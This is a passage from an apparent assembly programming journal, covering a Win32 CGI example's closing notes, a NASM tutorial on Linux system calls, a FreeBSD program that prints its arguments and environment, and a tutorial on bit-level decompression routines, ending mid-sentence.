             GetCommandLine,     'GetCommandLineA',\
             GetSystemTime,      'GetSystemTime',\
             GetEnvVar,          'GetEnvironmentVariableA',\
             GetStdHandle,       'GetStdHandle',\
             CreateFile,         'CreateFileA',\
             ReadFile,           'ReadFile',\
             WriteFile,          'WriteFile',\
             CloseHandle,        'CloseHandle',\
             ExitProcess,        'ExitProcess'
__________________|||-------------------[/code]-------------------|||


How to Run
----------
You can run this example from the command line since it requires no client
data.  You can also pipe the data into an html doc and open with IE:
     Main > Text.html
For the real CGI, place Main.exe into the cgi-bin directory, launch Apache,
and
type "localhost/cgi-bin/Main.exe" in the address box of IE.


References
----------
     SAMS Teach Yourself CGI in 24 Hours
             SAMS 2000                                   $24.99US
             Rafe Colburn                                ISBN: 0-672-31880-6

     CGI by Example
             QUE 1996                                    $34.99US
             Robert Niles & Jeffry Dwight                ISBN: 0-7897-0877-9

     HTML in Plain English - 2nd Edition
             MIS Press 1998                              $19.95US
             Sandra E. Eddy                              ISBN: 1-55828-587-3

     Cascading Sytle Sheets - The Definitive Guide
             O'Reilly 2000                               $34.95US
             Eric A. Meyer                               ISBN: 1-56592-622-6

     Win32 Programming Reference (Win32 API Help file)
             Microsoft 1990-1995                         Free
             http://win32asm.rxsp.com/files/win32api.zip

Contact
-------
eet_1024@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                              Writing A Useful Program With
NASM
                                              by Jonathan Leto


Intro
-----
Much fun can be had with assembly programming, it gives you a much deeper
understanding about the inner workings of your processor and kernel. This
article is geared towards the beginning assembly programmer who can't seem
to
justify why he is doing something as masochistic as writing an entire
program
in assembly language. If you don't already know one or more other
programming
languages, you really have no business reading this. Many constructs will
also
be explained in terms of C. You should also be familiar with the command
line
options of NASM, no sense going over them again here.


Getting Started
---------------
So you want to write a program that actually DOES something. "Hello, world"
isn't cutting it anymore. First, an overview of the various parts of an
assembly program: (For terse documentation, the NASM manual is the place to
go.)


The .data section
-----------------
This section is for defining constants, such as filenames or buffer sizes,
this data does not change at runtime. The NASM documentation has a good
description of how to use the db,dd,etc instructions that are used in this
section.


The .bss section
----------------
This section is where you declare your variables.
They look something like this:

         filename:       resb    255     ; REServe 255 Bytes
         number:         resb    1       ; REServe 1 Byte
         bignum:         resw    1       ; REServe 1 Word (1 Word = 2 Bytes)
         longnum:        resd    1       ; REServe 1 Double Word
         pi:             resq    1       ; REServe 1 double precision float
         morepi:         rest    1       ; REServe 1 extended precision float


The .text section
-----------------
This is where the actual assembly code is written. The term "self modifying
code" means a program which modifies this section while being executed.


In The Beginning ...
--------------------
The next thing you probably noticed while looking at the source to various
assembly programs, there always seems to be "global _start" or something
similar at the beginning of the .text section. This is the assembly
program's
way of telling the kernel where the program execution begins. It is exactly,
to
my knowledge, like the main function in C, other than that it is not a
function, just a starting point.


The Stack and Stuff
-------------------
Also like in C, the kernel sets up the environment with all of the
environment
variables, and sets up **argv and argc. Just in case you forgot, **argv is
an
array of strings that are all of the arguments given to the program, and
argc
is the count of how many there are.  These are all put on the stack. If you
have taken Computer Science 101, or read any type of introductory computer
science book, you should know what a stack is. It is a way of storing data
so
that the last thing you put in is the first that comes out. This is fine and
dandy, but most people don't seem to grasp how this has anything to do with
their computer. "The stack" as it is ominously referred too, is just your
RAM.
That's it.  It is your RAM organized in such a way, so that when you "push"
something onto "The stack", all you are doing is saving something in RAM.
And
when you "pop" something off of "The stack", you are retrieving the last
thing
you put in, which is on the top.

Ok, now let's look at some code that you are likely to see.

         section .text           ; declaring our .text segment
                 global  _start  ; telling where program execution should
start

         _start:                 ; this is where code starts getting exec'ed
                 pop     ebx     ; get first thing off of stack and put into
ebx
                 dec     ebx     ; decrement the value of ebx by one
                 pop     ebp     ; get next 2 things off stack and put into
ebx
                 pop     ebp

What does this code do? It simply puts the first actual argument into the
ebx
register. Let's say we ran the program on the command line as so:

         $ ./program 42 A

When where are on the _start line, the stack looked something like this:

         -----------
         | 3       |     The number of arguments, including argv[0],
         |         |     which is the program name
         -----------
         |"program"|     argv[0]
         -----------
         | "42"    |     argv[1] NOTE: This is the character "4" and "2",
         |         |     not the number 42
         -----------
         | "A"     |     argv[2]
         -----------

So, the first instruction, "pop ebx", took the 3, and put it into ebx.
Then we decrement it by one, because the program name isn't really an
argument.

Depending on if you need to later use the argument count later on, you will
see
other arguments put into either the same register or a different one.

Now, "pop ebp" puts the program name into ebp, and then the next "pop ebp"
overwrites it, and puts "42" into ebp. The last value of ebp is not
preserved,
and since you have popped it off of the stack, it is gone forever.


Doing more interesting things
-----------------------------
Moving on, how exactly do you interact with the rest of the system? You know
how to manipulate the stack, but how to you get the current time, or make a
directory, or fork a process, or any other wonderful thing a Unix box can
do? I
am pleased to introduce you to the "system call". A system call is the
translator that lets user-land programs (which is what you are writing),
talk to
the kernel, who is in kernel-land, of course. Each syscall has a unique
number,
so that you can put it into the eax register, and tell the kernel "Yo, wake
up
and do this", and it hopefully will. If the syscall takes arguments, which
most
do, these go into ebx,ecx,edx,esi,edi,ebp , in that order.

Some example code always helps:

         mov     eax,1           ; the exit syscall number
         mov     ebx,0           ; have an exit code of 0
         int     80h             ; interrupt 80h, the thing that pokes the
                                 ; kernel and says, "do this"

The preceding code is equivalent to having a "return 0" at the end of your
main
function. Ok, ok, still not very useful, but we are getting there.

A more useful example:

         pop     ebx             ; argc
         pop     ebx             ; argv[0]
         pop     ebx             ; the first real arg, a filename


         mov     eax,5           ; the syscall number for open()
                                 ; we already have the filename in ebx

         mov     ecx,0           ; O_RDONLY, defined in fcntl.h

         int     80h             ; call the kernel

                                 ; now we have a file descriptor in eax

         test    eax,eax         ; lets make sure it is valid
         jns     file_function   ; if the file descriptor does not have the
                                 ; sign flag ( which means it is less than 0
)
                                 ; jump to file_function

         mov     ebx,eax         ; there was an error, save the errno in ebx
         mov     eax,1           ; put the exit syscall number in eax
         int     80h             ; bail out

Now we are starting to get somewhere. You should be starting to realize that
there is no black magic or voodoo in assembly programming, just a very
strict
set of rules.  If you know how the rules work, you can do just about
everything. Though I haven't tried it, I have seen network coding in
assembly,
console graphics ( intros! ), and yes, even X windows code in assembly.

So where do find out all of the semantics for all of the various system
calls?
Well first, the numbers are listed in asm/unistd.h in Linux, and
sys/syscall.h
in the *BSD's. To find out information about each one, such as what
arguments
they take and what values they return, look no further that your man pages!
I
will hold your hand in finding out about the next syscall we are going to
use,
read().

"man read" didn't give you exactly what you wanted did it? That is because
program manuals and shell manuals are shown before the programming manuals
are.
If you are using bash, you probably are looking at the BASH_BUILTINS(1) man
page. To get to what you really want, try "man 2 read".  Now you should be
looking at sections like SYNOPSIS, DESCRIPTION, DESCRIPTION, ERRORS and a
few
others. These are the most important. Take a look at synopsis, it should
look
like:

         ssize_t read(int fd, void *buf, size_t count);

NOTE: ssize_t and size_t are just integers.

The first argument is the file descriptor, followed by the buffer, and then
how
many bytes to read in, which should be however long the buffer is. For the
best
performance, use 8192, which is 8k, as your count. Make your buffer a
multiple
of this, 8192 is fine. Now you know what to put in your registers. Reading
the
RETURN VALUE section, you should see how read() returns the number of bytes
it
read, 0 for EOF, and -1 for errors.

file_function:
         mov     ebx,eax         ; sys_open returned file descriptor into eax
         mov     eax,3           ; sys_read
                                 ; ebx is already setup
         mov     ecx,buf         ; we are putting the ADDRESS of buf in ecx
         mov     edx,bufsize     ; we are putting the ADDRESS of bufsize in
edx

         int     80h             ; call the kernel

         test    eax,eax         ; see what got returned
         jz      nextfile        ; got an EOF, go to read the next file
         js      error           ; got an error, bail out

                                 ; if we are here, then we actually read some
                                 ; bytes

Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in
what
you would call an array in C. What can you do now? Well, the first thing
that
comes to mind is print it out.  Wait a sec, there is no man page for printf
in
section 2. What's the deal? Well, printf is a library function, implemented
by
good ol' libc. You are going to have to dig a little deeper, and use
write().
So now you looking at the man page. write() writes to a file descriptor.
What
the hell good does that do me? I want to print it out! Well, remember,
everything in Unix is a file, so all you have to do is write to STDOUT. From
/usr/include/unistd.h, it is defined as 1 . So the next chunk of code looks
like:

         mov     edx,eax         ; save the count of bytes for the write
syscall
         mov     eax,4           ; system call for write
         mov     ebx,1           ; STDOUT file descriptor
                                 ; ecx is already set up
         int     80h             ; call kernel

         ; for the program to properly exit instead of segfaulting right here
         ; ( it doesn't seem to like to fall off the end of a program ), call
         ; a sys_exit

         mov     eax,1
         mov     ebx,0
         int     80h

What you have now just written is basically "cat", except it only prints the
first 8192 bytes.


Portability
-----------
In the preceding section, you saw how the call the kernel in Linux with
NASM.
This is fine if you are never ever going to use another operating system,
and
you enjoy looking up the system kernel numbers, but is not very practical,
and
extremely unportable. What to do?  There is a great little package called
asmutils started by Konstantin Boldyshev, who runs
http://www.linuxassembly.org. If you haven't read all of the good
documentation
on that site, that should be your next step. Asmutils provides an easy to
use
and portable interface to doing system calls in whichever Unix variant you
use
( and even has support for BeOS.)  Even if you aren't interesting in using
these Unix utilities that are rewritten in assembly, if you want to write
portable NASM code, you are better off using it's header files than rolling
your own.  With asmutils, your code will look like this:

         %include "system.inc"   ; all the magic happens here

         CODESEG                 ; .text section

         START:                  ; always starts here

         sys_write STDOUT,[somestring],[strlen]

         END                     ; code ends here

This is much more readable then doing everything by system call number, and
it
will be portable across Linux,FreeBSD,OpenBSD,NetBSD,BeOS and a few other
lesser known OS's. You can now use system calls by name, and use standard
constants like STDOUT or O_RDONLY, just like in C.  The "%include" statement
works precisely as it does in C, sourcing the contents of that file.

To learn more about how to use asmutils, read the Asmutils-HOWTO, which is
in
the doc/ directory of the source. Also, to get the latest source, use the
following commands:

export CVS_RSH=ssh
cvs -d:pserver:anonymous@...:/cvsroot/asm login
cvs -z3 -d:pserver:anonymous@...:/cvsroot/asm co asmutils

This will download the newest, bleeding edge source into a subdirectory
called
"asmutils" of your current directory. Take a look at some of the simpler
programs, such as cat,sleep,ln,head or mount, you will see that there isn't
anything horrendously difficult about them. head was my first assembly
program,
I made extra comments on purpose, so that would be a good place to start.


Debugging
---------
Strace will definitely by your friend. It is the easiest tool to use to
debug
your problem. Most of the time when writing in assembly, other that syntax
errors, you will just get a segmentation fault. This provides you with a
ZERO
useful information. With strace, at least you will see after which system
call
your program is choking. Example:

         $ strace ./cal2
         execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
         read(1, "", 0)                          = 0
         --- SIGSEGV (Segmentation fault) ---
         +++ killed by SIGSEGV +++

Now you know to look after your first read system call. But it starts
getting
tricky when you have lots of pure assembly, which strace cannot show. That's
when gdb comes into play. There is some very good information about using
gdb
and enabling debugging information in NASM in the Asmutils-HOWTO, so I won't
reproduce it here. For a quick and dirty solution, you could do something
like
this:

         %define notdeadyet      sys_write STDOUT,0,__LINE__

Now you can litter the source with notdeadyet's, and hopefully see where
things
are going astray with the help of strace. Obviously this is not practical
for
complex bugs or voluminous source, but works great for finding careless
mistakes when you are starting out. Example:

         $ strace ./cal2
         execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
         write(1, NULL, 16)                      = 16
         write(1, NULL, 26)                      = 26
         write(1, NULL, 41)                      = 41
         --- SIGSEGV (Segmentation fault) ---
         +++ killed by SIGSEGV +++

Now we know that we are still going on line 41, and the problem is after
that.


Next ?
------
Now it is your turn to explore the insides of your operating system, and
take
pride in understanding what's really going on under the covers.


Reference
---------
Places to get more information:

      Linux Assembly - http://www.linuxassembly.org
      NASM Manual ( available in doc/html directory of source )
      Assembly Programming Journal - http://asmjournal.freeservers.com/
      Mammon_'s textbase -
http://www.eccentrica.org/Mammon/sprawl/textbase.html
      Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html
      Sandpile - http://www.sandpile.org
      comp.lang.asm.x86
      NASM - http://www.cryogen.com/Nasm
      Asmutils-HOWTO - doc/ directory of asmutils


Feedback
--------
Feedback is welcome, hopefully this was of some use to budding Unix assembly
programmers.


Availability
------------
The most current version of this document should be available at
http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt .


Appendix : Jumps
----------------
When I first began looking at assembly source code, I saw all these crazy
instructions like "jnz" and the like. It looked like I was going to have to
remember the names of a whole slew of inanely named instructions. But after
a
while it finally clicked what they all were. They are basically just "if
statements" that you know and love, that work off of the EFLAGS register.
What
is the EFLAGS register? Just a register with lots of different bits that are
set to zero or one, depending on the previous comparison that the code made.

Some code to set the stage:

         mov     eax,82
         mov     ebx,69

         test    eax,ebx
         jle     some_function

What on earth is "jle"? Why it's "Jump if Less than or Equal." If eax was
less
than or equal to ebx, code execution will jump to "some_function", if not,
it
keeps chugging along. Here is a list which will hopefully shed some light on
this part of assembly that was mysterious to me when I began. Some of these
are
logically the same, but are provided because is some situations one will be
more intuitive than the other.

Jump                 Meaning            Signedness (S or U)
-----------------------------------------------------------
ja      | Jump if above                 |       U
jae     | Jump if above or Equal        |       U
jb      | Jump if below                 |       U
jbe     | Jump if below or Equal        |       U
jc      | Jump if Carry                 |
jcxz    | Jump if CX is Zero            |
je      | Jump if Equal                 |
jecxz   | Jump if ECX is Zero           |
jz      | Jump if Zero                  |
jg      | Jump if greater               |       S
jge     | Jump if greater or Equal      |       S
jl      | Jump if less                  |       S
jle     | Jump if less or Equal         |       S
jmp     | Unconditional jump            |
jna     | Jump Not above                |       U
jnae    | Jump Not above or Equal       |       U
jnc     | Jump if Not Carry             |
jncxz   | Jump if CX Not Zero           |
jne     | Jump if Not Equal             |
jng     | Jump if Not greater           |       S
jnge    | Jump if Not greater or Equal  |       S
jnl     | Jump if Not less              |       S
jnle    | Jump if Not less or Equal     |       S
jno     | Jump if Not Overflow          |
jnp     | Jump if Not Parity            |
jns     | Jump if Not signed            |
jnz     | Jump if Not Zero              |
jo      | Jump if Overflow              |
jp      | Jump if Parity                |
jpe     | Jump if Parity Even           |
jpo     | Jump if Parity Odd            |
js      | Jump if signed                |
jz      | Jump if Zero                  |
-----------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                         Command Line in
FreeBSD
                                                         by G. Adam Stanislav


In my Issue 8 article I mentioned I did not know how command line parameters
(or arguments) were passed to programs under FreeBSD. I have received some
feedback, both from the FreeBSD community and APJ readers.

Thanks to that feedback, I can now pass this information on to you. Further,
this information should be valid, more or less, for all 386 based Unix and
Unix-like operating systems. At any rate, if your Unix variety does not come
with the information on its command line parameters, chances are that, if
you
adjust my sample code to use the kernel interface of your OS, it will work
just
fine.


Code startup
------------
Unix is much more security-conscious than MS DOS and MS Windows. While
DOS/Windows assembly language programmers may be used to the operating
system
loading their code and then CALLing it (so you can exit with a simple RET,
and
possibly crash the system), Unix creates a new process for each program.
This
process is separate from the kernel and from all other processes. Hence, the
system does not CALL your code, it JMPs to it. If you issue a RET, you will
crash your program, but Unix will continue running unharmed. At least that's
the theory. However, under FreeBSD it is the practice as well: I tried it
and
can vouch for it.


The top of the stack
--------------------
Before the Unix system jumps to your code, it pushes some information on the
top of the stack: Your stack, that is, not system stack, so you can access
it
all from your own code. Here is what the stack contains, starting at the
top:

         number of arguments ("argc")
         argument 0
         argument 1
         ...
         argument n (n = argc - 1)
         NULL pointer
         environment 0
         environment 1
         ...
         environment n
         NULL pointer

Not all of these are necessarily there (e.g., if the program was called with
no
arguments). However, the number of arguments, argument 0, and the two NULL
pointers are always present.

Argument 0 is not a command line parameter in the sense DOS programmers are
used to find. Instead, it is the name of the program. C programmers will
find
it as the familiar argv[0].

Another important difference between DOS and Unix is that DOS programs just
give you the full command line, i.e., whatever appears after the name of the
program, including any leading and trailing blanks. It is then up to the
programmer to strip all extra blanks.

Compared to that, parsing the Unix command line is much simpler as the
system
does some of the hard work for you. The individual arguments are separated,
and
usually contain no leading/trailing blanks. When they do, they are there
because the program caller wanted them there.

Let me illustrate. Suppose the user has typed the following command:

         ./args Hello, world. Here I come!

In that case, the top of the stack will look like this:

         6
         ./args
         Hello,
         world.
         Here
         I
         come!
         0
         environment 0
         environment 1
         ...
         environment n
         0

The arguments are nicely separated and contain no blanks. Now, suppose the
user
has typed:

         ./args Hello, world. "Here I come!"

The top of the stack looks like this:

         4
         ./args
         Hello,
         world.
         Here I come!
         0
         (etc)

This system, besides making it easier to parse, has a great advantage over
the
DOS way: It has no practical limit on the size of the command line.

Accessing the information
-------------------------
Because your program runs in its own process space, the stack is yours to do
with as you please. You can simply save the information in some data
structure
and leave the stack intact, or you can pop it off as you need it.

The C startup code uses the first approach: It saves the "argc" value in a
local variable, the argument 0 in another. It finds the start of the
environment variable list and stores it in a global variable. It then calls
main, passing that information to it, i.e. main(argc, *argv[], env);

The assembly language program can do that as well, but usually has no need
to.
If you process the command line at the start of your code, and never need to
see it again, you can just pop it off the stack one by one, analyze it, set
up
any flags or other variables, etc.

I have enclosed a simple assembly language program called args.asm below.
All
it does is print all the information the FreeBSD system has passed to it. It
is
useful as an example of one way of accessing the command line arguments (and
the environment) by simply popping it off one at a time.

It is also useful as a tool to study what format the arguments are in. For
example, running it will show you that the environment is passed to your
program in the form of name=value, where name is the name of the environment
variable, value is whatever text string is assigned to it.

You can assemble and link the program with NASM:

         nasm -f elf args.asm
         ld -o args args.o
         strip args

Try running it with and without command line arguments. Try placing the
arguments in single and double quotes, try all the nifty things a Unix shell
will let you do, such as:

         ./args $HOME
         ./args `ls -la`
         ./args "`ls -la`"
         ./args '`ls -la`'
         ./args
         ./args Hello, world. Here I come!
         ./args Hello, world. "Here I come!"
         ./args '      Hello,    world.   Here    I   come !   '

;-----------------------------------------------------------------------------;
; args.asm
;
; Print FreeBSD command line arguments and environment
;
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;-----------------------------------------------------------------------------;

section .data

prgmsg  db      'Program name:', 0Ah, 0Ah
tab     db      9
prglen  equ     $-prgmsg
argmsg  db      0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah
arglen  equ     $-argmsg
envmsg  db      0Ah, 'Environment variables:', 0Ah, 0Ah
envlen  equ     $-envmsg
huhmsg  db      "Hmmm... Something's wrong here...", 0Ah
huhlen  equ     $-huhmsg

section .code

what.the.heck:
         ; Print the huhmsg to stderr and abort.
         push    dword huhlen
         push    dword huhmsg
         sub     eax, eax
         mov     al, 2           ; stderr
         push    eax
         add     al, al          ; SYS_write
         push    eax
         int     80h
         ; No need to clean up the stack since we're quitting now.

         sub     eax, eax
         inc     al              ; return 1 (failure), SYS_exit
         push    eax
         push    eax
         int     80h

; ELF programs always start at _start
global  _start
_start:
         ; We come here with "argc" on the top of the stack. Its value
         ; is at least 1. If not, something went seriously wrong.
         pop     ecx             ; ECX = argc
         jecxz   what.the.heck

         ; Print the prgmsg
         sub     eax, eax
         push    dword prglen
         push    dword prgmsg
         inc     al              ; stdout
         push    eax
         push    eax
         mov     al, 4           ;SYS_write
         int     80h
         add     esp, byte 16

         ; Get argv[0], i.e., the program path
         pop     ebx             ; EBX = argv[0]

         ; argv[0] is a NUL-terminated string. We can find its
         ; length by scanning for the NUL.
         sub     eax, eax
         sub     ecx, ecx
         cld
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx
         dec     ecx

         ; Print the string
         push    ecx
         push    ebx
         inc     al                      ; stdout
         push    eax
         push    eax
         mov     al, 4
         int     80h
         add     esp, byte 16

         ; Print the argmsg
         sub     eax, eax
         push    dword arglen
         push    dword argmsg
         inc     al                      ; stdout
         push    eax
         push    eax
         mov     al, 4                   ; SYS_write
         int     80h
         add     esp, byte 16

         ; By now, we have no idea what the value of argc was.
         ; We did not save it because we don't need it.
         ; The top of the stack now contains pointers
         ; to command line arguments (if any), followed
         ; by a NULL pointer.
         ;
         ; We simply print everything before the NULL.

.argloop:
         pop     ebx             ; next argument
         or      ebx, ebx
         je      .env            ; NULL pointer

         ; Print a tab
         sub     eax, eax
         inc     al
         push    eax
         push    dword tab
         push    eax             ; stdout
         mov     al, 4           ; SYS_write
         push    eax
         int     80h
         add     esp, byte 16

         ; Find the length
         sub     ecx, ecx
         sub     eax, eax
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx

         ; Append a new line
         mov     byte [edi-1], 0Ah

         ; Print the string
         push    ecx
         push    ebx
         inc     al              ; stdout
         push    eax
         mov     al, 4           ; SYS_write
         push    eax
         int     80h
         add     esp, byte 16
         jmp     short .argloop  ; next

.env:
         ; Print the envmsg
         sub     eax, eax
         push    dword envlen
         push    dword envmsg
         inc     al              ; stdout
         push    eax
         push    eax
         mov     al, 4           ; SYS_write
         int     80h
         add     esp, byte 16

         ; The top of the stack now contains pointers to
         ; environment variables, followed by a NULL pointer.
         ; We do what we did for the arguments:

.envloop:
         pop     ebx
         or      ebx, ebx
         je      .exit

         sub     eax, eax
         inc     al
         push    eax
         push    dword tab
         push    eax
         mov     al, 4
         push    eax
         int     80h
         add     esp, byte 16

         sub     ecx, ecx
         sub     eax, eax
         dec     ecx
         mov     edi, ebx
repne   scasb
         not     ecx
         mov     byte [edi-1], 0Ah

         push    ecx
         push    ebx
         inc     al
         push    eax
         mov     al, 4
         push    eax
         int     80h
         add     esp, byte 16
         jmp     short .envloop

.exit:
         sub     eax, eax        ; return 0 (success)
         push    eax
         inc     al              ; SYS_exit
         push    eax
         int     80h

;--- End of program
----------------------------------------------------------;



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                                Compressing
data
                                                                by Feryno
Gabris


First, intro about decompress. It's needed a routine called "get_next_bit".
Here are 3 examples:

;-----
get_next_bit:
         add     dl,dl
         jnz     no_new_byte
         lodsb
         mov     dl,al
         adc     dl,dl
no_new_byte:
         ret
;-----
get_next_bit:
         shl     bx,1
         jnz     no_new_word
         mov     bx,word [esi]
         inc     esi
         inc     esi
         rcl     bx,1
no_new_word:
         ret
;-----
get_next_bit:
         shl     ebp,1
         jnz     no_new_dword
         lodsd
         rcl     eax,1
         xchg    ebp,eax
no_new_dword:
         ret
;-----

And this is the usage of get_next_bit:

;-----
         mov     esi,control_bits_offset
         mov     edi,place_for_store_decompressed_bytes
         cld
         mov     dl,80h
B0:     call    get_next_bit
         jc      L1
L0:     ... some decompress instructions ...
         jmp     B0
L1:     ... some decompress instructions ...
         jmp     B0

get_next_bit:
         add     dl,dl           ; this is instruction for put next bit to
Carry
                                 ; highest bit will be become to Carry Flag
and
                                 ; all lower bits are shifted left by 1
         jnz     no_new_byte
; next 3 instructions handle: all control_bits are processed and removed
         lodsb                   ; load new control_byte with 8 control_bits
         xchg    edx,eax         ; swap to another register only
         adc     dl,dl           ; puth highest control_bit to Carry
                                 ; shift all bits left by 1
                                 ; recycle highest bit by MOV DL,80h ( bit=1
                                 ; become to lower bit (bit 0.) )
no_new_byte:
         ret
;-----

Note about two instructions: MOV DL,80h and ADC DL,DL.
MOV DL,80h set up first control_bit, but this isn't true control_bit used
for
switch decompress between L0 and L1. Binary, 80h = 10000000b and highest bit
(bit 7.) of 80h is bit=1 . All other bits=0 (bits 6. 5. 4. 3. 2. 1. 0.).
Highest bit name can be as helper_control_bit. Helper_control_bit is never
destroyed until decompress process ends. Helper_control_bit recycle through
instruction ADC DL,DL after each loaded bits (8 bits by LODSB, 32 by LODSD)
are
used (after 8 times call get_next_bit with LODSB - 1st example procedure or
32 times call get_next_bit with LODSD 3nd example procedure).
Image of first call get_next_bit and call get_next_bit after use and remove
all
control_bits is similar:

Status is: DL register = 80h = 10000000b

Here is instructions run:

1.      ADD     DL,DL
         80h + 80h = 00h CarryFlag=1 ZeroFlag=1 (in Carry is
helper_control_bit)

2.      LODSB
         load control_byte with 8 control_bits, this instruction dont touch
         Carry

3.      XCHG    EDX,EAX
         swap control_byte to DL register, this instruction don't touch Carry
         (note that instructions PUSH,POP,MOV,XCHG,INC,LODSB,... don't change
         Carry)

4.      ADC     DL,DL
         recycle helper_control_bit, shift all bits left by 1 and new highest
         control_bit become to Carry

This may be the most difficult part of decompress for understand. OK,
next...
Instructions on L0 and L1 can be as:

L0:     MOVSB
         JMP     B0
L1:     ... calculate ECX
         ... calculate EBX (delta, shift)
         PUSH    ESI
         MOV     ESI,EDI
         SUB     ESI,EBX
         REPZ MOVSB
         POP     ESI
         JMP     B0

First mode, L0, isn't true decompress mode. Byte isn't compressed and it
will
be moved only. This mode has bad pack ratio, but must be used for store some
bytes that can't be decompressed by L1 mode. It use 1 byte + 1 bit = 9 bits
for
store 1 byte = 8 bits.

Second mode, L1, is true decompress mode. It calculate ECX number of bytes
for
decompress and calculate EBX, value that can be named as DELTA or SHIFT.
This
assume that chain of ECX bytes is on positions [EDI] and [EDI-EBX] in DATA
bytes and ASM code like:

         MOV     ESI,EDI
         SUB     ESI,EBX
         REPZ CMPSB

In data bytes compression process return with ZeroFlag=1 and ECX=0.
It has good pack ratio, better for large chains (big ECX) and small shift
(small EBX). Methods for calculate ECX and EBX are similar:

It's lucid that ECX as well EBX aren't zero (ECX<>0 EBX<>0) hence highest
bit
of register is bit=1.

First instruction for calculate ECX setup highest bit=1 and all next bits
will
be put by call get_next_bit. First instruction is:

         MOV     ECX,1

or INC ECX if ECX=0.

Next instructions are:

         CALL    GET_NEXT_BIT
         ADC     ECX,ECX                 ; as well RCL ECX,1 can be used

How to terminate calculate ECX ? Again through use call get_next_bit !
Here is full routine for calculate ECX in decompress:

         MOV     ECX,1
LCC0:   CALL    GET_NEXT_BIT
         ADC     ECX,ECX
         CALL    GET_NEXT_BIT
         JC      LCC0

A minimal value ECX=2 can be produced by this code. ECX=1 isn't needed
because
this handle L0 mode (MOVSB) and L0 is more rational (but has bad pack ratio)
for pack 1 byte as L1 mode.

Example for calculate ECX=5=101b
Highest bit is by INC ECX and i remove it - binary 01b
Bit sequence for calculate ECX=5 is 01 10 binary.

Calculate ECX=110100b
Remove highest bit (this bit put INC ECX in decompress) - binary 10100b
Bit sequence for calculate ECX is 11 01 11 01 00 binary.

Calculate ECX=2=10b. Bit sequence is 0 0 binary.
Calculate ECX=3=11b. Bit sequence is 1 0 binary.
Calculate ECX=4=100b. Bit sequence is 0 1 0 0 binary.
Calculate ECX=5=101b. Bit sequence is 0 1 1 0 binary.
Calculate ECX=6=110b. Bit sequence is 1 1 0 0 binary.
Calculate ECX=7=111b. Bit sequence is 1 1 1 0 binary.
Calculate ECX=8=1000b. Bit sequence is 0 1 0 1 0 0 binary.
Calculate ECX=16=10000b. Bit sequence is 0 1 0 1 0 1 0 0 binary.
Calculate ECX=17=10001b. Bit sequence is 0 1 0 1 0 1 1 0 binary.
Calculate ECX=18=10010b. Bit sequence is 0 1 0 1 1 1 0 0 binary.
Calculate ECX=19=10011b. Bit sequence is 0 1 0 1 1 1 1 0 binary.

Calculate EBX has some similar steps but some other steps.
EBX can be EBX=1 and can be done as:

         MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
         ADC     EBX,EBX
         CALL    GET_NEXT_BIT
         JC      LCD0
         DEC     EBX

But by experients, it's often EBX>16 and for EBX<16 can be used another
decompress mode. Calculate EBX=15 require 8 bits = 1 byte by use upper
codes.
It's a better use 8 bits = 1 byte for fill BL in EBX and calculate all bits
highest of BL ( bits 31. - 8. ) by mode similar as calculate ECX.
Here is it:

         MOV     EBX,1
LCD0:   CALL    GET_NEXT_BIT
         ADC     EBX,EBX
         CALL    GET_NEXT_BIT
         JC      LCD0
         DEC     EBX
         DEC     EBX
         SHL     EBX,8
         MOV     BL,byte [ESI]
         INC     ESI

Note that at least 2 times DEC EBX must be used for make EBX=0 possibility
before SHL EBX,8 shift all bits higher and free BL.

It's a mode named without_change_delta. Principle is 3 times use DEC EBX
after
calculate EBX=2. Calculate EBX=-1 indicate that calculate new delta isn't
needed and old delta can be used. Old delta can be saved to unused register
or
stack by previous SUB ESI,EBX REPZ MOVSB and restored by mode
without_change_delta.

Principle of mode for pack 2-3 bytes with delta from 1 to 7Fh:

1. Load 1 byte = 8 bits
2. bit 0. = 1 indicate packed 2 bytes
    bit 0. = 0 indicate packed 3 bytes
3. high 7 bits ( bits 7. - 1. ) is delta

Here is code example

         XOR     EBX,EBX ; (EBX=0)
         MOV     ECX,1   ; (ECX=1)
         MOV     BL,[ESI]
         INC     ESI
         SHR     BL,1    ; this explore bit 0. and shift bits to make
EBX=delta
         SBB     CL,0
         INC     ECX
         INC     ECX

It's lucid that result BL=0 after this code is impossible delta. I make use
of
this for TERMINATE decompress process.

A nice idea for pack 1 byte with delta from 1 to 15:

         XOR     EBX,EBX
         MOV     ECX,1
U02:    MOV     BL,00010000b
         CALL    GET_NEXT_BIT
         ADC     BL,BL
         JNC     U02

Result EBX=0 is impossible delta and is used for pack byte 00h. This byte
00h
is the most frequent byte in 32-bit opcodes. Last code continue...

         JNZ     STORE_1_BYTE
         XCHG    EBX,EAX ; make EAX=0 in 1 byte 32-bit opcode
         JMP     STORE_BYTE
         ...
STORE_1_BYTE:
         NEG     EBX
         MOV     AL,[EDI+EBX]
STORE_BYTE:
         STOSB

This is all about decompress intro. It's a part not implemented in
decompress
meanwhile. This is part like:

                 CMP     EBX,7D00h
                 JNC     ZVYS_O_DVE
                 CMP     EBX,500h
                 JNC     ZVYS_O_JENNU
                 JMP     NYST_NEZVYSUJ
ZVYS_O_DVE:     INC     ECX
ZVYS_O_JENNU:   INC     ECX
NYST_NEZVYSUJ:

It's not rational compress 2 bytes with delta > 4FFh because this request
2+(3*2)+8+2 = 18 bits and this can be done with 2 times use MOVSB mode
(2*9=18
bits).

U00:    movsb                   ; require 1 byte = 8 bits
         call    get_next_bit    ; require 1 bit
         jnc     U00

It's rational compress 4 bytes with delta > 7CFFh because this request
